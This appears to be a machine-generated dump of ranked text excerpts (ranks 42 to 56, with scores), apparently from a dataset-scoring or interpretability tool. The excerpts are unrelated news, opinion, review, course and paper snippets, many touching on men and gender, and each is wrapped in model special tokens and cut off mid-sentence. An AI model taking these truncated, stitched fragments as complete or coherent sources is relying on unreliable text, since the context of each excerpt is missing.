poor, young white men, a move intended to rile the left and raise the profile of the website and the so-called alt-right, a movement whose ascendancy reached new heights this week when Breitbart News executive Steve Bannon was made chairman of Donald Trump’s presidential campaign. + +After the initial announcement in January, Yiannopoulos and several figures in the alt-right hosted a five-hour online telethon to collect money from donors. In the description for the video on Yiannopoulos’s account, there is a +================================================================================ +Rank = 42; Score = 313344.0 +<|begin_of_text|>Taipei, May 28 (CNA) Six female volunteer soldiers are to be posted on remote Taiwan-controlled islands in the South China Sea, the Coast Guard Administration (CGA) said Tuesday. + +The six women, aged between 19 and 24, will be the first female Taiwanese soldiers ever to serve on the Dongsha (Pratas) Islands and Taiping Island in the Spratly Islands, according to the administration. + +They are among some 21 volunteer soldiers who are receiving training for service on the two South China Sea islands, a CGA official said. + +"Three of them are preparing to work on the Dongsha Islands and the other three are going to Taiping Island," the official said. + +At present, 100 soldiers and officers are serving on Taiping Island, the largest islet in the Spratlys, while 150 officers and enlisted men are working on the Dongsha Islands. + +"All of them are men," the CGA official said. + +The six women are scheduled to begin their service on the islands in late June, the official said, adding that relevant facilities, including female dormitories, have been set up in preparation for their arrival. + +Taiping Island lies 1,600 km to the southwest of Kaohsiung, while the Dongsha islands are 450 km to the southwest of the southern port city. + +As Taiwan has decided to move from a conscription to an all-volunteer military by the end of 2014, the CGA has been carrying out a recruitment drive since the beginning of this year. + +(By Liu Chien-pang and Sofia Wu) + +ENDITEM/J<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 43; Score = 313344.0 +<|begin_of_text|>Photos via Facebook. + +In front of Calgary City Hall, a couple dozen of them stood shoulder-to-shoulder in an attempt to make an unbreakable human wall. Each of them wore a uniform consisting of a black T-shirt emblazoned with a Roman helmet—a look that wouldn't be out of place in a biker gang. It was a line filled with mostly men, and a few women, who you wouldn't want to go toe-to-toe with in a bar. All of them were white. + +Some of the III% (the "three percent," as they call themselves) brought shock canes—a non-lethal weapon that can deliver up to a million volts to the person hit—while others had billy clubs or regular old canes. On many of the shirts was the III%'s credo, "NSA"—Never Standing Alone. Scattered throughout the rest of the square were small groups overseeing the proceedings from an elevated position, as well as III%er members dressed in plain clothes milling about the crowd gathering "intel" on what they considered to be the day's enemy—Antifa, the anti-fascist group. + +In front of the line their leader, Beau Welling, the president of the Alberta chapter and national vice-president of the III%, stood calling commands quietly into a mobile phone he held like a walkie talkie. + +A few hours earlier, the group had swept the perimeter checking the potted plants that surround the municipal building for any improvised explosive device. They were concerned that ISIS might target the event or that Antifa may have planted weapons beforehand. + +Beau Welling in front of his group at the Calgary rally. Photo by Mack Lamoureux. + +The group of III%ers was attending the rally as "security detail" for a controversial anti-Islam speaker named Sandra Solomon, who was involved in a dust up with anti-fascists in Winnipeg a few days prior. Welling had made it clear to the group beforehand that attendance was mandatory, citing the Winnipeg incident and partisan violence south of the border. + +This was effectively the III% Alberta's coming out party—a planned operation that they called "Operation Shock N Awe"—and a show of force by a far-right anti-Islamic organization that claims to be heavily armed and ready for "war" on Canadian soil. + +An eight-month VICE Canada investigation into the inner workings of the group has found it to be a tight-knit openly anti-Islamic group that is unique in Canada's far-right ecosystem—one that, as +================================================================================ +Rank = 44; Score = 305152.0 +<|begin_of_text|>ST. CHARLES, Mo. – One day after Rep. Todd Akin vowed to stay in the race for US Senate, dismissing calls from across the Republican party to step aside, Sen. Claire McCaskill welcomed Akin back to the campaign by bashing him for abandoning veterans during his years in Congress. + +Visiting two VFW halls near St. Louis on Wednesday, McCaskill, the Democrat Akin is hoping to unseat here in Missouri, went through a list of Akin votes that took more than two minutes to recite. + +Audiences were mostly male and senior citizen. Survivors of combat in Vietnam – and at least one World War II veteran – looked on beneath baseball caps decorated with military insignia as she accused Akin of blocking bonuses for troops stationed in Iraq and Afghanistan and voting against health care benefits for reservists and national guard members. + +“So that’s kind of the list,” McCaskill said of Akin’s voting record. “Now, I don’t have a list like that." + +The attack did not include any mention of the recent controversy embroiling Akin. + +Sunday, Akin told a television interviewer that women could biologically prevent pregnancies resulting from what he called “legitimate rape.” + +The remarks set off a firestorm, but Wednesday McCaskill only alluded to them broadly. + +During a press conference outside a VFW home in nearby Overland, McCaskill brushed aside questions about Akin’s future. + +“The voters have spoken, and he’s the nominee,” McCaskill said. + +“We’re going to draw the contrasts that I think are necessary so that voters know that he’s outside the mainstream, he’s very extreme,” she added later. + +Tuesday, Akin let a deadline for withdrawing from the Senate race pass. + +Rep. Todd Akin, R-Mo., confirms with TODAY's Matt Lauer that vice presidential candidate and fellow congressman Paul Ryan advised him to step down amid the fallout of comments he made about rape and abortion. + +He told NBC’s Matt Lauer during a Wednesday interview on the TODAY show that his nomination was a “decision made by the citizens of our state, not the party bosses.” + +McCaskill’s VFW visits were part of a so-called “Vets for Claire” listening tour that the campaign says was arranged prior to the Akin controversy. + +A VFW official in Overland asked reporters to hold McCaskill’s press conference outside the building, in order to keep the organization compliant with rules prohibiting political activity by 501(c)(3) charity groups +================================================================================ +Rank = 45; Score = 303104.0 +<|begin_of_text|>Women are discriminated against in all areas of gaming. What can we do about it? + +WARNING: this article involves feminism. Those offended by the idea of gender equality should STEP AWAY FROM THEIR COMPUTERS NOW and get back inside their caves. Not a misogynist? Then hey buddy, sit back and relax. I’d offer you a cup of tea but you’re miles away (and I don’t have any tea). + +Sexism permeates our society, that’s a given, but you might not have realised just how much it occurs in gaming. There are three levels at which it exists: at an industry level, in games themselves, and from within gamers. It’s vital that we are aware of these problems but, more importantly, we have to do our best in tackling them. To do this, we must look at each problem in turn. + +First: sexism in the industry. There is evidence that suggests women who work in gaming are under-represented and suffer some of the worst gender-based harassment. Female gamers make up 45% of the gaming population; yet male game designers make up 89% of the industry and earn 23.6% more than their female counterparts. What a kick in the balls vagina. There have also been many high-profile incidents of women being harassed by men in the workplace. One of the most recent stories involved Josh Mattingly, CEO and founder of Indiestatik, publicly apologising and “stepping down” after sending a female game developer inappropriate and unprovoked sexual messages on Facebook. + +People have claimed that women should just stand up for themselves and that speaking up against those that harass them should be enough to stop the problem, but there is not always a clear cut solution. The #thatwoman hashtag shows that in speaking up, women are likely to be ostracised and have it limit their future career. Perhaps the risk would be worth the overall benefits, but it is understandable why women in gaming don’t always feel free to confront those that may oppress or belittle them. It would be like Yoshi trying to stand up to Mario – he’s just going to drop Yoshi mid-jump and carry on like nothing happened anyway. + +Similarly, the #1reasonwhy hashtag asked women to speak out about why they don’t feel comfortable in the gaming industry. The results included stories of groping and being constantly mistaken for assistants and receptionists. + +Jade Raymond, Producer of Assassin’s Creed, was accused of using her looks to sell the game + +What is there to be done about +================================================================================ +Rank = 46; Score = 301056.0 +<|begin_of_text|>A new MSN poll for Business Insider found that the majority of men and women still prefer the company of men at work. + +And it’s not just men supporting their own gender: One in five men and women said they would rather work with a male colleague. + +Perhaps this male confidence also stems from believing in their own success. + +Most men in the MSN poll believed that the gender gap is an issue of the past. 40% of men surveyed said that women are treated “very fairly” in the workplace while only 17% of women believed the same. This reinforces a separate study that found 58% of U.S. men in the workforce believed that “all obstacles to gender equality are gone.” + +That’s what researchers found in studies on confidence in the workplace: men are more confident —almost unquestioning— in their abilities and more confident that when things go wrong at work, it’s their gender, and not their performance, that’s to blame. As Ladders has previously reported, male leaders have an advantage and are better liked — across generations. + +Millennial men believe men make better leaders + +Multiples studies got the same result: men are very confident in their abilities—so confident that they suspect discrimination when they don’t get the job. Out of the 8,000 millennials aged between 18-34 that Qualtrics and Accel surveyed, 33% of millennial men believed that they had faced frequent gender discrimination at work, compared with the 21% of millennial women who felt the same way. + +Moreover, millennial men were 50% more likely to believe that their gender was “affecting their career opportunities,” although Qualtrics didn’t say whether the men believed the effect was positive or negative, meaning whether the men believed they received better or worse opportunities because of their gender. + +Meanwhile, women were more likely to believe in gender equality at work, with 41% believing that men and women are “judged by the same criteria in the workplace.” + +The Qualtrics study also showed vastly different views between young men and women on what makes a good boss or leader. + +For instance, millennial men are more likely than their female counterparts to believe that men are more effective leaders, with 38% of young men saying that compared to 14% of young women. + +And, while millennial men and women both mostly had no preference for their boss’s gender, they tend to favor strictly gender-limited workplaces: Two-thirds of millennial women and 72% of men prefer to work +================================================================================ +Rank = 47; Score = 301056.0 +<|begin_of_text|>Silicon Valley Photo: HBO + +HBO’s Silicon Valley captures a world you’ve rarely seen depicted with intelligence or care, populated by types that you didn’t know were types; it’s sometimes sweet but often brutal, but thanks to the keen satirical eye of its co-creator, Mike Judge (Office Space), you never feel that you’re watching unfair swipes. It’s about prospectors in what might be the last remaining gold rush, the world of tech in Northern California. That so many of the claims yield fool’s gold gives the characters’ grandiose pronouncements about their own talent a certain poignancy. Everybody on this show wants to be the next Steve Jobs, but a lot of them are lucky just to have jobs. “Do you know how sea turtles have, like, a shit-ton of babies?” asks a tech-industry-lawyer character. “Because most of them die on the way down to the water.” + +Silicon Valley, which premieres Sunday, April 6, fuses the white-collar purgatory of Office Space with the Hollywood wonderland of knaves and fools depicted on Entourage, Curb Your Enthusiasm, and The Larry Sanders Show. The place is a human zoo filled with narcissists, most of whom would be insufferable if they weren’t so nakedly needy. The hero, Richard (Thomas Middleditch), is a classic Mike Judge everyman, with an added dose of brilliance and perhaps a mild case of Asperger’s. He lives and works in a ranch-style house known as an “incubator.” Its owner is Erlich (T. J. Miller), an arrogant pothead who sold his own start-up years ago and rolled the money over into this for-profit commune, where would-be entrepreneurs live in exchange for promising Erlich 10 percent of anything they sell. On Entourage, this setup would have yielded a nonstop series of deranged bacchanals, but here it seems about as randy as a meeting of a high-school yearbook committee, minus the girls. Like Silicon Valley the place, Silicon Valley the show is so male that it seems as if somebody dropped a bomb in Palo Alto that eliminated most of the women. The writers mock this borderline ­monoculture at every turn. The show kicks off at a private party at which Kid Rock sings but no one dances and the segregation of men and women is so drastic that a character likens it to “a Hasidic wedding.” The house’s lone non +================================================================================ +Rank = 48; Score = 299008.0 +<|begin_of_text|>Circuits and Electronics + +6.002 introduces the fundamentals of the lumped circuit abstraction. Topics covered include: resistive elements and networks; independent and dependent sources; switches and MOS transistors; digital abstraction; amplifiers; energy storage elements; dynamics of first- and second-order networks; design in the time and frequency domains; and analog and digital circuits and applications. Design and lab exercises are also significant components of the course. 6.002 is worth 4 Engineering Design Points. + +Linear Integrated Circuits + +This course will focus on the design of MOS analog integrated circuits with extensive use of Spice for the simulations. In addition, applications of analog integrated circuits will be covered which may include such topics as RF amplification, discrete and continuous time filtering and A/D conversion. Though the focus will be on MOS implementations, comparison with bipolar circuits will be given. + +Digital Integrated Circuits + +Initially my goal was to focus just on physics, maths and computer science lectures but I have been getting emails lately asking me to post other lectures as well.Here are all the engineering lectures I could find: + +This course is an introduction to digital integrated circuits. The material will cover CMOS devices and manufacturing technology along with CMOS inverters and gates. Other topics include propagation delay, noise margins, power dissipation, and regenerative logic circuits. We will look at various design styles and architectures as well as the issues that designers must face, such as technology scaling and the impact of interconnect. Examples presented in class include arithmetic circuits, semiconductor memories, and other novel circuits. + +The course will start with a detailed description and analysis of the core digital design block, the inverter. Implementations in CMOS will be discussed. Next, the design of more complex combinational gates such as NAND, NOR and EXORs will be discussed, looking at optimizing the speed, area, or power. The learned techniques will be applied on more evolved designs such as adders and multipliers. The influence of interconnect parasitics on circuit performance and approaches to cope with them are treated in detail. Substantial attention will then be devoted to sequential circuits, clocking approaches and memories. The course will be concluded with an examination of design methodologies. + +Integrated Circuits for Communications + +Analysis and design of electronic circuits for communication systems, with an emphasis on integrated circuits for wireless communication systems. Analysis of noise and distortion in amplifiers with application to radio receiver design. Power amplifier design with application to wireless radio transmitters. Class A, Class B, and Class C power amplifiers. +================================================================================ +Rank = 49; Score = 299008.0 +<|begin_of_text|>Wesleyan University said Monday that campus fraternity groups will soon be required to admit both men and women, a change that followed a lawsuit by a student saying she was raped at a frat party and that came amid growing scrutiny of colleges’ efforts to combat campus sexual assault. + +“With equity and inclusion in mind, we have decided that residential fraternities must become fully co-educational over the next three years,” top university officials said in an email to the university community. + +“If the organizations are to continue to be recognized as offering housing and social spaces for Wesleyan students, women as well as men must be full members and well-represented in the body and leadership of the organization,” said the email from Joshua Boger and Michael S. Roth, the chair and president of the Board of Trustees, respectively. + +The move comes after a student filed a lawsuit saying she was raped in 2o13 at a fraternity party, and that multiple party attendees watched. The email said the school had been considering what to do about Greek life at Wesleyan for years, and received input over the summer from students, faculty and alumni. + +The Brief Newsletter Sign up to receive the top stories you need to know right now. View Sample Sign Up Now + +Other schools like Trinity College have made similar changes in recent years (though not without student protest). The Wesleyan website reads, “Greek life is small at Wes.” There are a small number of fraternities on campus, some with houses and some without. There is only one sorority and it does not have a house. The school already has other co-ed societies. + +Read the email here. + +Contact us at editors@time.com.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 50; Score = 299008.0 +<|begin_of_text|>What do you think are the reasons why high school students make it — but stop there? College is a whole four years, but not everyone goes through with it. What holds them back? + +We looked at several sources on the Internet and found that these are the main contributing factors: + +Homesickness and feeling that you don’t fit in. It’s a whole new world out there, and you may not be ready to embrace it. Educational burnout. While college gives you control and flexibility over your schedule, the hard demanding schedule, challenging courses, and boatload of homework certainly has turned a lot of students away from the desire to continue. Academic unpreparedness. Sometimes, high school didn’t really prepare students for college. Other times, students slacked off in high school and paid the price during their post-secondary years. The high school goal was to pass (so that students could get into college); in college, it is to succeed. Personal or family issues. You may have had an unfortunate illness in the family or you yourself just got totally get stressed out from the workload. Financial constraints. Tuition costs continue to soar, and scholarships or grants are not always available. Additionally, financial situations can change from year to year. Too much fun — but not enough education. Some students take advantage of their friendships, which could put them on academic probation due to suffering grades or absence in classes. The school isn’t a good academic fit for the student. You’ve selected a great school that is very arts-centric. However, you realize that you like the sciences better. Similarly, you may hate the average class size of 100 and prefer much smaller classes for more individualized attention. Setting sights on the wrong major. You may have wanted to be a doctor but after taking several science classes, you decided that you’re rather go into marketing. Does your school have a marketing major? If not, you’re likely to go elsewhere. No guidance or mentors. In high school, teachers and counselors were there to guide you, as high school classes are typically smaller than the entering freshman class. It’s a lot harder to get the personalized attention that you’ve been used to and that could turn people off quickly. External demands, particularly within part time or full time employment. Can we say Mark Zuckerberg and Facebook? When the job puts too many demands on you, you may have to choose, and money usually wins out. Time to move out. If the cold winter just doesn’t suit you, you may decide to go elsewhere. You may want +================================================================================ +Rank = 51; Score = 296960.0 +<|begin_of_text|>An experimental Marine Corps study obtained by the Monitor has concluded that units with both men and women are less effective than all-male units. + +The results of the experiment, known as the Ground Combat Element Integrated Task Force (GCEITF), could be used by the Marines as grounds to ask for an exemption to the combat exclusion policy, which currently bars women from taking part in direct combat. + +The services have until January to open all jobs to women, or ask Pentagon leaders for an exemption by October. + +The GCEITF included roughly 200 male and 75 female volunteers, who were evaluated on how they performed a series of physical combat tasks between March and May. + +The results of the study come on the heels of news last month that two women passed the Army’s grueling Ranger School and earned their Ranger tabs. + +The Marine Corps’ conclusions have sparked criticism from female Marines and others, who argue that the study was poorly conducted and biased toward a belief that men are biologically and psychologically built to be better fighters. + +Indeed, efforts to integrate combat units constitute “social engineering,” Lt. Gen. Gregory Newbold, a former Marine infantryman who served as Director of Operations on the Pentagon’s Joint Staff before he retired, argued in an op-ed this week that was widely seen as laying the groundwork for the Marines’ experimental task force study release. + +In introducing its conclusions, the Marine Corps cites the “the brutal and extremely physical nature of direct ground combat, often marked by close, interpersonal violence.” + +It further argues that the nature of battle “remains largely unchanged throughout centuries of warfare, despite technological advancements.” + +Mr. Newbold echoes similar points, citing “the burden of 30 to 80 pounds of personal equipment, mind-bending physical exertion, energy-sapping adrenaline highs, or the fact that the threadbare clothes you wore were unchanged for over three weeks and may have been'scented' by everything from food, to blood, dysentery, and whatever was in the dirt that constituted your bed. And don’t forget insects of legendary proportion and number,” he adds in his op-ed, published by the War on the Rocks, a highly-regarded military blog. + +“More importantly,” Newbold argues, are the bonds with comrades who experienced the “shared duties of clearing the urinals, the pleasures of a several nights of hilarious debauchery, and multiple near-death experiences – a comrade in arms who has heard more about your personal thoughts than your most intimate friends or family.” + +Though Newbold acknowledges that the two +================================================================================ +Rank = 52; Score = 296960.0 +<|begin_of_text|>The Federal Treasury is on the verge of bailing out Wall Street with an infusion of $700 billion of taxpayer dollars. Bad decisions by many actors (banks and lenders, consumers, insurers and others) have contributed to the crisis, we are told, and now it is an emergency. + +What a difference a policy area makes. + +In our nation’s social welfare programs, such as the Temporary Assistance for Needy Families (TANF) program, bad decisions are grounds for sanctions and a denial of assistance–not a helping hand or a cash infusion (Just imagine!). Certainly, our leaders have not treated poverty as an emergency or a reason for government action. + +Other differences abound…. + +Corporate welfare: Corporate executives, mostly men, being bailed out. + +Social welfare: Mostly low-income women with children, being given minimal assistance, and certainly not enough to help move them out of poverty. + +Corporate welfare: Few restrictions on the money. + +Social welfare: TANF beneficiaries face numerous restrictions, including having to sign a “personal responsibility” statement in some states (Something, personally, I’d like to see these corporate executive do). + +Corporate welfare: It is a major “concession” not to cap compensation to the executives in the affected firms. + +Social welfare: Under TANF, most states impose income and asset limits on eligibility. For assets, these limits are generally between $2,000 and $3,000. In some states, if your car is worth much more than this, you are not eligible. (States similarly limit eligibility for Food Stamps and Medicaid.) + +So, how many of our corporate executives would be disqualified from the bailout if this were taken into account? + +Corporate welfare: Few details about the accountability required under this bailout are available. Given the lobbying frenzy around the agreement, don’t expect much. + +Social welfare: Significant oversight, including additional and burdensome requirements around supervision and documentation of program participation enacted in 2005 and codified in regulations earlier this year. + +Corporate welfare: $700 billion. + +Social welfare: $16 billion per year, which has not changed since 1996. + +Just think what a $700 billion investment in poverty reduction could do. Bailouts to help low-income single mothers get job training to move them into careers with good pay and benefits, and a lifetime of economic independence. Bailouts to support access to quality child care so that single mothers could afford to leave their children in a safe environment while they go to work. Bailouts to support transportation vouchers that would get low-income parents to job training sites or works +================================================================================ +Rank = 53; Score = 294912.0 +<|begin_of_text|>Energy development is the field of activities focused on obtaining sources of energy from natural resources. These activities include production of conventional, alternative and renewable sources of energy, and for the recovery and reuse of energy that would otherwise be wasted. Energy conservation and efficiency measures reduce the demand for energy development, and can have benefits to society with improvements to environmental issues. + +Societies use energy for transportation, manufacturing, illumination, heating and air conditioning, and communication, for industrial, commercial, and domestic purposes. Energy resources may be classified as primary resources, where the resource can be used in substantially its original form, or as secondary resources, where the energy source must be converted into a more conveniently usable form. Non-renewable resources are significantly depleted by human use, whereas renewable resources are produced by ongoing processes that can sustain indefinite human exploitation. + +Thousands of people are employed in the energy industry. The conventional industry comprises the petroleum industry, the natural gas industry, the electrical power industry, and the nuclear industry. New energy industries include the renewable energy industry, comprising alternative and sustainable manufacture, distribution, and sale of alternative fuels. + +Classification of resources [ edit ] + +Open System Model (basics) + +Energy resources may be classified as primary resources, suitable for end use without conversion to another form, or secondary resources, where the usable form of energy required substantial conversion from a primary source. Examples of primary energy resources are wind power, solar power, wood fuel, fossil fuels such as coal, oil and natural gas, and uranium. Secondary resources are those such as electricity, hydrogen, or other synthetic fuels. + +Another important classification is based on the time required to regenerate an energy resource. "Renewable" resources are those that recover their capacity in a time significant by human needs. Examples are hydroelectric power or wind power, when the natural phenomena that are the primary source of energy are ongoing and not depleted by human demands. Non-renewable resources are those that are significantly depleted by human usage and that will not recover their potential significantly during human lifetimes. An example of a non-renewable energy source is coal, which does not form naturally at a rate that would support human use. + +Fossil fuels [ edit ] + +Fossil fuel (primary non-renewable fossil) sources burn coal or hydrocarbon fuels, which are the remains of the decomposition of plants and animals. There are three main types of fossil fuels: coal, petroleum, and natural gas. Another fossil fuel, liquefied petroleum gas (LPG), is principally derived from the production of natural gas. Heat +================================================================================ +Rank = 54; Score = 292864.0 +<|begin_of_text|>The court fight between Apple and the FBI prompted a slew of letters and legal briefs last week from outside parties, including many tech companies and privacy groups. But a particularly powerful letter came from a collection of racial justice activists, including Black Lives Matter. + +The letter focused on potential civil rights abuses, should the FBI gain the power to conscript a technology company into undermining its own users’ security. + +“One need only look to the days of J. Edgar Hoover and wiretapping of Rev. Martin Luther King, Jr. to recognize the FBI has not always respected the right to privacy for groups it did not agree with,” wrote the signatories, including arts and music nonprofit Beats, Rhymes & Relief, the Center for Media Justice, the Gathering for Justice, Justice League NYC, activist and writer Shaun King, and Black Lives Matter co-founder and Black Alliance for Just Immigration executive director Opal Tometi. + +Those tactics haven’t ended, they argue. “Many of us, as civil rights advocates, have become targets of government surveillance for no reason beyond our advocacy or provision of social services for the underrepresented.” + +In Washington and Silicon Valley, the debate over unbreakable encryption has an aura of elite, educated, mostly male whiteness — from the government representatives who condemn it to the experts who explain why it’s necessary. + +But the main targets of law enforcement surveillance have historically been African-American and Muslim communities. + +Malkia Cyril, co-founder of the Center for Media Justice, one of the letter’s signatories, gave a speech at one of several nationwide protests outside Apple stores two weeks ago, supporting the tech giant and pointing out the FBI’s history of surveilling black activists. “In the context of white supremacy and police violence, Black people need encryption,” she wrote in a tweet. + +Others representing Black Lives Matter attended protests across the country, including in front of the FBI headquarters itself — the J. Edgar Hoover building — in downtown Washington, D.C. + +“I’ve been reviewing the Apple vs. FBI lawsuit and now realize how important it is that that Apple wins the lawsuit. #DontHackApple,” DeRay Mckesson, Baltimore mayoral candidate and prominent Black Lives Matter organizer, tweeted on February 22. “When I was arrested in protest, my iPhones were in police custody. They were secure. The police couldn’t access my info,” he added. “If Apple has to create an insecure iPhone iOS app, all of the private data that we store on our phones is at risk.” + +The letter to California federal Mag +================================================================================ +Rank = 55; Score = 290816.0 +<|begin_of_text|>Jurassic Park's Dr Ellie Sattler is not impressed. + +Two female scientists have had their research paper rejected by a peer review journal because it wasn't co-authored by a male. + +That's right. + +Dr Fiona Ingleby from the University of Sussex and Dr Megan Head from ANU wrote a paper about how gender differences influence the experiences of PHD students transitioning to post-doctoral studies, and submitted it to PLoS One, a journal from the Public Library of Science. + +In an incredible demonstration of their point and some amazing comedic use of irony (actually not funny though), the reviewer's response was that they should get a male (any male, really) to co-author the study, "to serve as a possible check against interpretations that may sometimes be drifting too far away from empirical evidence into ideologically-based assumptions". Just... wow. + +Advertisement + +It gets worse, though. The reviewer actually makes some rather helpful suggestions for answers to their hypothesis these doctors had obviously not considered, due to being women. + +For example, perhaps male doctoral students co-author more papers on average than women because men can run faster than women. + +Or perhaps these woman researchers hadn't considered that men get published in better journals than women because men work longer hours, because they have better stamina. + +This is actually what the guy said. An incredulous Dr Fiona Ingleby tweeted screenshots, because empirical evidence. + +Reviewer’s conclusion: we should get a man’s name on MS to improve it (male colleagues had already read it) (2/4) pic.twitter.com/fhiyzNG0R8 — Fiona Ingleby (@FionaIngleby) April 29, 2015 + +…and this is a bit hypocritical given the reviewer’s own ideological biases throughout the review, for example: (3/4) pic.twitter.com/aJ8aTIRdYL — Fiona Ingleby (@FionaIngleby) April 29, 2015 + +Journal has been given three weeks so far to respond to our appeal. If there was ever an argument for double-blind peer review… (4/4) — Fiona Ingleby (@FionaIngleby) April 29, 2015 + +After a significant social media backlash, the Public Library of Science has accepted its reviewer's comments were out of line, and promised to consider the appeal to the decision. + +@FionaIngleby @PLOS regrets the tone, content and spirit of this review; your appeal is in process & we're reviewing the matter. +================================================================================ +Rank = 56; Score = 290816.0 +<|begin_of_text|>The Anatomy of a Large-Scale Hypertextual Web Search Engine + +Sergey Brin and Lawrence Page + +{sergey, page}@cs.stanford.edu + +Computer Science Department, Stanford University, Stanford, CA 94305 + +Abstract + +In this paper, we present Google, a prototype of a large-scale search engine which makes heavy use of the structure present in hypertext. Google is designed to crawl and index the Web efficiently and produce much more satisfying search results than existing systems. The prototype with a full text and hyperlink database of at least 24 million pages is available at http://google.stanford.edu/ + +To engineer a search engine is a challenging task. Search engines index tens to hundreds of millions of web pages involving a comparable number of distinct terms. They answer tens of millions of queries every day. Despite the importance of large-scale search engines on the web, very little academic research has been done on them. Furthermore, due to rapid advance in technology and web proliferation, creating a web search engine today is very different from three years ago. This paper provides an in-depth description of our large-scale web search engine -- the first such detailed public description we know of to date. + +Apart from the problems of scaling traditional search techniques to data of this magnitude, there are new technical challenges involved with using the additional information present in hypertext to produce better search results. This paper addresses this question of how to build a practical large-scale system which can exploit the additional information present in hypertext. Also we look at the problem of how to effectively deal with uncontrolled hypertext collections where anyone can publish anything they want. Keywords: World Wide Web, Search Engines, Information 